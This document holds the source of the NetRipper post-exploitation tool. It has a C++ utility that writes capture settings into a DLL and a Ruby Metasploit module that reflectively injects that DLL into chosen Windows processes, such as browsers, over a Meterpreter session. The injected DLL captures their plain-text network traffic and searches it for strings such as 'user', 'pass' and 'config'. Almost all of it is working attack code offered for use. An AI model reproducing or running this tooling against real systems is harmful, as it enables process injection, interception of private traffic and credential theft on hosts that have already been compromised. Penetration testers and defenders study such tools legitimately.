File: Metasploit/netripper.cpp
/*
	Name:   NetRipper Project
	Author: Ionut Popescu <ionut.popescu@outlook.com>
*/

#include <iostream>
#include <vector>
#include <string>
#include <cstdio>
#include <cstdlib>
#include <sys/stat.h>

using namespace std;

// Temporary configured DLL

#define TEMP_DLL_FILE "/usr/share/metasploit-framework/modules/post/windows/gather/netripper/NewDLL.dll"

// Prototypes

unsigned int GetFileSize(string p_sFilename);
string GenerateData(string p_sArgs);
bool ReplaceData(string p_sDLL, string p_sData);

// Print help

void PrintHelp()
{
	cout << endl;

	cout << "Generate DLL:" << endl << endl;
	cout << "  -h,  --help          Print this help message" << endl;
	cout << "  -w,  --write         Full path for the DLL to write the configuration data" << endl;
	cout << "  -l,  --location      Full path where to save data files (default TEMP)" << endl << endl;

	cout << "Plugins:" << endl << endl;
	cout << "  -p,  --plaintext     Capture only plain-text data. E.g. true" << endl;
	cout << "  -d,  --datalimit     Limit capture size per request. E.g. 4096" << endl;
	cout << "  -s,  --stringfinder  Find specific strings. E.g. user,pass,config" << endl << endl;

	cout << "Example: ./netripper -w DLL.dll -l TEMP -p true -d 4096 -s user,pass" << endl << endl;
}

// Main

int main(int argc, char* argv[])
{
	// Arguments

	if(argc == 1)
	{
		PrintHelp();
		return 0;
	}

	// Each value

	string sDLL      = "";
	string sLocation = "TEMP";
	string sPlain    = "true";
	string sLimit    = "4096";
	string sFinder   = "user,login,pass,database,config";

	// All options

	for(int i = 0; i < argc; i++)
	{
		string sArg = argv[i];

		// Help

		if(sArg.compare("-h") == 0 || sArg.compare("--help") == 0)
		{
			PrintHelp();
			return 0;
		}

		// Write DLL

		if(sArg.compare("-w") == 0 || sArg.compare("--write") == 0)
		{
			if(argv[i + 1] == NULL || argv[i + 1][0] == '-') 
			{
				cout << endl << "Invalid option specified: " << sArg << endl;
				return 1;
			}

			sDLL = (string)argv[i + 1];
		}

		// Location

		if(sArg.compare("-l") == 0 || sArg.compare("--location") == 0)
		{
			if(argv[i + 1] == NULL || argv[i + 1][0] == '-') 
			{
				cout << endl << "Invalid option specified: " << sArg << endl;
				return 1;
			}

			sLocation = (string)argv[i + 1];
		}

		// Plain

		if(sArg.compare("-p") == 0 || sArg.compare("--plaintext") == 0)
		{
			if(argv[i + 1] == NULL || argv[i + 1][0] == '-') 
			{
				cout << endl << "Invalid option specified: " << sArg << endl;
				return 1;
			}

			sPlain = (string)argv[i + 1];
		}

		// Limit

		if(sArg.compare("-d") == 0 || sArg.compare("--datalimit") == 0)
		{
			if(argv[i + 1] == NULL || argv[i + 1][0] == '-') 
			{
				cout << endl << "Invalid option specified: " << sArg << endl;
				return 1;
			}

			sLimit = (string)argv[i + 1];
		}

		// Finder

		if(sArg.compare("-s") == 0 || sArg.compare("--stringfinder") == 0)
		{
			if(argv[i + 1] == NULL || argv[i + 1][0] == '-') 
			{
				cout << endl << "Invalid option specified: " << sArg << endl;
				return 1;
			}

			sFinder = (string)argv[i + 1];
		}
	}

	// Create static data

	string sFinalData = "plaintext=" + sPlain + ";datalimit=" + sLimit + ";stringfinder=" + sFinder + ";"
		+ "data_path=" + sLocation + ";";

	// Write data to new DLL

	if(ReplaceData(sDLL, GenerateData(sFinalData)) == true)
		cout << endl << "DLL succesfully created: " << TEMP_DLL_FILE << endl;
	else 
		cout << endl << "Cannot create DLL " << TEMP_DLL_FILE << endl;

	return 0;
}

// Generate XML data
// E.g. plaintext=true;datalimit=4096;stringfinder=user,pass;data_path=TEMP;

string GenerateData(string p_sArgs)
{
	string sResult = "<NetRipper>";
	string option_name  = "";
	string option_value = "";

	for(size_t i = 0; i < p_sArgs.length(); )
	{
		if(p_sArgs[i] == '=')
		{
			i++;

			// Get values

			while(p_sArgs[i] != ';')
			{
				option_value += p_sArgs[i];
				i++;
			}

			// Do things with options

			sResult += "<" + option_name + ">";

			sResult += option_value;

			for(size_t j = 0; j < 256 - option_value.length(); j++)
				sResult += '?';

			sResult += "</" + option_name + ">";

			// Reset

			option_name = "";
			option_value = "";
			i++;
		}

		option_name += p_sArgs[i];
		i++;
	}

	sResult += "</NetRipper>";
	return sResult;
}

// Replace configuration data into DLL

bool ReplaceData(string p_sDLL, string p_sData)
{
	FILE *hFile;
	FILE *pFile;
	size_t nWritten = 0;
	unsigned char *lpBuffer = NULL;
	unsigned int dwLength = 0, dwBytesRead = 0;
	
	// Open DLL for read

	hFile = fopen( p_sDLL.c_str(), "rb" );

	if( hFile == NULL )
	{
		cout << "Cannot read DLL file: " << p_sDLL << endl;
		return false;
	}

	// Get DLL size

	dwLength = GetFileSize( p_sDLL );
	
	if( dwLength == 0 )
	{
		cout << "Failed to get the DLL file size" << endl;
		return false;
	}

	// Allocate space for DLL

	lpBuffer = (unsigned char *)malloc( dwLength );
		
	if( !lpBuffer )
	{
		cout << "Failed to allocate space!" << endl;
		return false;
	}

	// Read DLL
	
	dwBytesRead = fread( lpBuffer, 1, dwLength, hFile );

	if( dwBytesRead != dwLength )
	{
		cout << "Failed to read file!" << endl;
		return false;
	}

	// Parse data buffer and find XML settings

	unsigned char pcSearchString[] = "<NetRipper>";
	unsigned int dwSearchSize = 11;
	bool bFound = true;

	for(unsigned int i = 0; i < dwBytesRead - dwSearchSize; i++)
	{
		bFound = true;

		for(unsigned int j = i; j < i + dwSearchSize; j++)
		{
			if(lpBuffer[j] != pcSearchString[j - i]) bFound = false;
		}

		// Found data, write data

		if(bFound) 
		{
			// Open file
			
			pFile = fopen(TEMP_DLL_FILE, "wb");

			if(pFile == NULL) 
			{
				cout << "Cannot open temporary DLL file: " << TEMP_DLL_FILE << endl;
				return false;;
			}

			// Write first chunk of data

			nWritten = fwrite(lpBuffer , sizeof(char), i, pFile);

			if(nWritten != i)
			{
				cout << "Cannot write first chunk to temporary DLL file: " << TEMP_DLL_FILE << endl;
				return false;
			}

			// Write configured data p_sData

			nWritten = fwrite(p_sData.c_str(), sizeof(char), p_sData.length(), pFile);

			if(nWritten != p_sData.length())
			{
				cout << "Cannot write configured data to temporary DLL file: " << TEMP_DLL_FILE << endl;
				return false;
			}

			// Write the rest of the DLL

			nWritten = fwrite(lpBuffer + i + p_sData.length(), sizeof(char), dwBytesRead - i - p_sData.length(), pFile);

			if(nWritten != dwBytesRead - i - p_sData.length())
			{
				cout << "Cannot write full data to temporary DLL file: " << TEMP_DLL_FILE << endl;
				return false;
			}
			
			fclose(pFile);
		}
	}

	// Cleanup

	if( hFile )
		fclose( hFile );

	if( lpBuffer )
		free( lpBuffer );

	return true;
}

// Get file size

unsigned int GetFileSize(string p_sFilename)
{
  struct stat statbuf;

  if (stat(p_sFilename.c_str(), &statbuf) == -1) 
  {
	return 0;
  }

  return statbuf.st_size;
}

File: Metasploit/netripper.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class MetasploitModule < Msf::Post
  
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Windows Gather NetRipper Capture Network Traffic',
      'Description'   => %q{
        This module will capture plain-text network traffic of target processes
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'Ionut Popescu <ionut.popescu[at]outlook.com>' ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
    ))

    register_options(
    [
      OptString.new('PROCESSNAMES', [ false, 'Process names. E.g. firefox.exe,chrome.exe' ]),
      OptString.new('PROCESSIDS',   [ false, 'Process IDs. E.g. 1244,1256' ]),
      OptString.new('DLLPATH',      [ false, 'Where to find NetRipper DLLs. Default is /usr/share/metasploit-framework...' ]),
      OptString.new('DATAPATH',     [ false, 'Where to save files. E.g. C:\\Windows\\Temp or TEMP', 'TEMP' ]),
      OptString.new('PLAINTEXT',    [ false, 'True to save only plain-text data',                   'false' ]),
      OptString.new('DATALIMIT',    [ false, 'The number of bytes to save from requests/responses', '65535' ]),
      OptString.new('STRINGFINDER', [ false, 'Search for specific strings in captured data',        'DEFAULT' ])
    ], self.class)
  end
  
  # Generate configuration XML
  
  def generate_configuration(datapath, plaintext, datalimit, stringfinder)
  
	confdata = "<NetRipper>"
	
	# Plaintext 
	
	confdata = confdata + "<plaintext>"
	confdata = confdata + plaintext
	confdata = confdata + "</plaintext>"
	
	# Datalimit
	
	confdata = confdata + "<datalimit>"
	confdata = confdata + datalimit
	confdata = confdata + "</datalimit>"
	
	# Stringfinder
	
	confdata = confdata + "<stringfinder>"
	confdata = confdata + stringfinder
	confdata = confdata + "</stringfinder>"
	
	# Datapath
	
	confdata = confdata + "<data_path>"
	confdata = confdata + datapath
	confdata = confdata + "</data_path>"
	
	# Final
	
	confdata = confdata + "</NetRipper>"
	
	# Add padding
	
	confdata = confdata.ljust(1000, '?')
	
	return confdata
  
  end
  
  # Configure DLL -> Write it to /tmp and return the location
  
  def configure_dll(dllfullpath, configdata)
  
	new_dll = "/tmp/NetRipper.dll"
	dll_file = File.open(dllfullpath, "rb")

	file_contents = dll_file.read
	file_size     = dll_file.size
	dll_file.close

	# Parse file

	bFound = true
	searchString = "<NetRipper>"

	for i in 0..file_size - 12

		bFound = true
	
		# Try to find the string
		
		for j in i..i+10
	
			if file_contents[j] != searchString[j - i]
				bFound = false
			end
	
		end
		
		# We found the string marker
	
		if bFound 
			
			# Write first part
			
			new_dll_file = File.open(new_dll, "wb")
			
			for a in 0..i-1
				new_dll_file.write(file_contents[a])
			end
			
			# Write configuration
			
			new_dll_file.write(configdata)
			
			# Write the second part
			
			newpos = i+1000
			
			for b in newpos..file_size-1
				new_dll_file.write(file_contents[b])
			end
			
			new_dll_file.close
			
		end

	end
	
	return new_dll
  
  end
  
  # Function to get the x86 or x64 DLL filename for specified process ID
  
  def get_dll_for_process(process_id, dllpath)
  
	dllfile = ""
  
	# Check if the system is 32 bits or 64 bits
    
    if sysinfo['Architecture'] =~ /x64/
    
		open_process = client.sys.process.open(process_id, PROCESS_ALL_ACCESS)
		apicall = session.railgun.kernel32.IsWow64Process(open_process.handle, 4)["Wow64Process"]
      
		# railgun returns '\x00\x00\x00\x00' if the process is 64 bits.
		
		if apicall == "\x00\x00\x00\x00"
			dllfile = dllpath + "DLL.x64.dll"
		else
			dllfile = dllpath + "DLL.x86.dll"
		end
		
	# System is 32 bits
	
    else
		dllfile = dllpath + "DLL.x86.dll"
    end
    
    return dllfile
  
  end
  
  # Inject in process 
  
  def inject_in_process(processdata, dllpath)
  
	print_status("Trying to inject in #{processdata['name']} - #{processdata['pid']}")
	      
	begin
	
		# Reflective DLL injection

		host_process = client.sys.process.open(processdata['pid'], PROCESS_ALL_ACCESS)
		dll_mem, offset = inject_dll_into_process(host_process, dllpath)
		host_process.thread.create(dll_mem + offset, 0)
		
		print_good("Successfully injected in #{processdata['name']} - #{processdata['pid']}")
	   
		# On error
	   
	rescue Rex::Post::Meterpreter::RequestError

		print_error("Cannot inject in #{processdata['name']} - #{processdata['pid']}")
	      
	end
  
  end

  # Main method

  def run
  
    processnames	 = datastore['PROCESSNAMES']
    processids		 = datastore['PROCESSIDS']
    dllpath   		 = datastore['DLLPATH']
    datapath		 = datastore['DATAPATH']
    plaintext		 = datastore['PLAINTEXT']
    datalimit		 = datastore['DATALIMIT']
    stringfinder	 = datastore['STRINGFINDER']
    
    # Where to find the DLL files
    
    if dllpath.nil?
		dllpath = "/usr/share/metasploit-framework/modules/post/windows/gather/netripper/"
	else
		dllpath = dllpath + "/"
    end
    
    # We must have a process specified for injection
    
    if processnames.nil? && processids.nil?
    
		print_error("Module failed! Is is required to speficy target PROCESSNAMES or PROCESSIDS\n")
		return
    
    end
      
	# Inject in specified processes
	
	session.sys.process.get_processes().each do |x|
	
		# Inject by process names
	
		if processnames.nil? == false
	
			processes = processnames.split(',')

			processes.each do |process_name|
	    
				if process_name.downcase == x['name'].downcase
	      
					# Inject
				
					dllforprocess = get_dll_for_process(x['pid'], dllpath)
					configdata    = generate_configuration(datapath, plaintext, datalimit, stringfinder)
					configureddll = configure_dll(dllforprocess, configdata)
					
					inject_in_process(x, configureddll)
	      
				end
				
			end
	
		end
		
		# Inject process IDs
		
		if processids.nil? == false
	
			processes = processids.split(',')

			processes.each do |process_id|
	    
				if process_id == x['pid']
	      
					# Inject
					
					dllforprocess = get_dll_for_process(x['pid'], dllpath)
					configdata    = generate_configuration(datapath, plaintext, datalimit, stringfinder)
					configureddll = configure_dll(dllforprocess, configdata)
					
					inject_in_process(x, configureddll)
	      
				end
				
			end
	
		end
   
	end

  end
  
end
